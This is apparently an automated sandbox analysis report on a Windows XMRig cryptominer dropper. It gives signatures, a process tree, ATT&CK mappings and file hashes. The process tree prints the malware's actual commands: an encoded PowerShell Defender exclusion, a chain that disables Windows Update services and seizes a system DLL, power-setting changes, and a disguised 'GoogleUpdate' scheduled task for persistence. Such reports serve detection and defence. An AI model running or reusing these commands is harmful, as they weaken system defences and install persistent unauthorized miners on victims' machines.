Analysis

  • max time kernel
    300s
  • max time network
    259s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    27-06-2022 10:15

General

  • Target

    e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe

  • Size

    7.4MB

  • MD5

    34719a80e9cca827371d5f1e44f10168

  • SHA1

    3ea872bd581ce47505a312d74f6b0e897202d021

  • SHA256

    e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec

  • SHA512

    2f96ffcb8a45d7dcb525c952e63cdd466ed60eb6bc624756f4c9d815ea40c2fe14da9e4905f7494db24d02c83354b8759adf677ea3c75b986626a376b0a53acf

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 14 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe
    "C:\Users\Admin\AppData\Local\Temp\e368dd29cf385103ed8df8ef9ff221be7c0f81ac56efffdad485bb141bbb9dec.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:376
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1692
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:336
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1512
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1008
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:2044
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:2040
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:1352
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1804
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:2024
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:576
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:900
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:1740
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:932
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:2032
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:288
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1580
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:900
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1876
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:2016
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1888
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:1032
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:1060
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:1056
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:1608
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:608
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:1384
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:1020
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1692
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1960
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:928
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1816
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1168
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                          PID:696
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:1048
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:1580
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:2016
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:1508
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1708
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:1620
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1620 CREDAT:275457 /prefetch:2
                              4⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:1744
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {96B050BA-C044-415C-B01F-3C28E92DB67D} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                        • Loads dropped DLL
                        PID:2032
                        • C:\Program Files\Chrome\updater.exe
                          "C:\Program Files\Chrome\updater.exe"
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1560
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1344
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
                              4⤵
                                PID:268
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -EncodedCommand "PAAjAHUAbAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAbABlACMAPgA="
                                  5⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1612
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                4⤵
                                  PID:1164
                                  • C:\Windows\system32\sc.exe
                                    sc stop UsoSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1808
                                  • C:\Windows\system32\sc.exe
                                    sc stop WaaSMedicSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1616
                                  • C:\Windows\system32\sc.exe
                                    sc stop wuauserv
                                    5⤵
                                    • Launches sc.exe
                                    PID:1888
                                  • C:\Windows\system32\sc.exe
                                    sc stop bits
                                    5⤵
                                    • Launches sc.exe
                                    PID:696
                                  • C:\Windows\system32\sc.exe
                                    sc stop dosvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:912
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1812
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1748
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1960
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1876
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:2016
                                  • C:\Windows\system32\takeown.exe
                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                    5⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1300
                                  • C:\Windows\system32\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                    5⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:1328
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1792
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:576
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:912
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1760
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                    5⤵
                                      PID:960
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                      5⤵
                                        PID:1748
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                        5⤵
                                          PID:1960
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                          5⤵
                                            PID:1876
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                            5⤵
                                              PID:1512
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                              5⤵
                                                PID:1400
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                5⤵
                                                  PID:872
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                4⤵
                                                  PID:608
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-ac 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2020
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-dc 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1816
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-ac 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1612
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-dc 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1608
                                                • C:\Windows\System32\conhost.exe
                                                  C:\Windows\System32\conhost.exe
                                                  4⤵
                                                    PID:1328
                                                    • C:\Windows\System32\conhost.exe
                                                      "C:\Windows\System32\conhost.exe" "ojfwdlyws"
                                                      5⤵
                                                        PID:2020
                                                    • C:\Windows\explorer.exe
                                                      C:\Windows\explorer.exe lvsbssvxocugcs1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1960

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Execution

                                              Scheduled Task

                                              1
                                              T1053

                                              Persistence

                                              Modify Existing Service

                                              2
                                              T1031

                                              Scheduled Task

                                              1
                                              T1053

                                              Privilege Escalation

                                              Scheduled Task

                                              1
                                              T1053

                                              Defense Evasion

                                              Modify Registry

                                              3
                                              T1112

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              Impair Defenses

                                              1
                                              T1562

                                              File Permissions Modification

                                              1
                                              T1222

                                              Discovery

                                              Query Registry

                                              2
                                              T1012

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              System Information Discovery

                                              3
                                              T1082

                                              Impact

                                              Service Stop

                                              1
                                              T1489

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                Filesize

                                                60KB

                                                MD5

                                                308336e7f515478969b24c13ded11ede

                                                SHA1

                                                8fb0cf42b77dbbef224a1e5fc38abc2486320775

                                                SHA256

                                                889b832323726a9f10ad03f85562048fdcfe20c9ff6f9d37412cf477b4e92ff9

                                                SHA512

                                                61ad97228cd6c3909ef3ac5e4940199971f293bdd0d5eb7916e60469573a44b6287c0fa1e0b6c1389df35eb6c9a7d2a61fdb318d4a886a3821ef5a9dab3ac24f

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                Filesize

                                                342B

                                                MD5

                                                8a1330221177ca494fd71a065e7799a4

                                                SHA1

                                                25eae6c3daea232d4297343e49666e3400984b4f

                                                SHA256

                                                f0e6b2a31942f5ace2929736d423d3ba70aad2c0c5cf0978af5966a57c458eea

                                                SHA512

                                                9f36f7045ffa2feb7556a71da7af93c787be6409a2f9aedbfc478c1e3f9c8ff0e476f7505aa8fcd141e3de0175dcd01479629f4ec264c8601c805b7249d3f2e0

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\GES51C2G.txt
                                                Filesize

                                                603B

                                                MD5

                                                6caf8cbd3712c25a632b601063c21e52

                                                SHA1

                                                931ef11d73c8060618063dcae5069a5a02dd3daa

                                                SHA256

                                                0fb23f283c756a77c67eed1fd5b17bc27ce3082a07d6f17cfbbbb3deaabe122d

                                                SHA512

                                                115553562a62c8f964f30278af5a1bfa77eab4631930ffea08e229880c952dd47eafae9510fab9558b8a95c67d55e3f9b98f9dad984b041bc95e07f2abecdfe5

                                              • C:\Windows\Temp\lol.bat
                                                Filesize

                                                59B

                                                MD5

                                                f580e0e80cc87b25e38ea2c0c8059d04

                                                SHA1

                                                299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                SHA256

                                                9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                SHA512

                                                5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                              • C:\Windows\Temp\run.bat
                                                Filesize

                                                98B

                                                MD5

                                                731afe244b2414169a5f630d52646e56

                                                SHA1

                                                e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                SHA256

                                                6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                SHA512

                                                84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

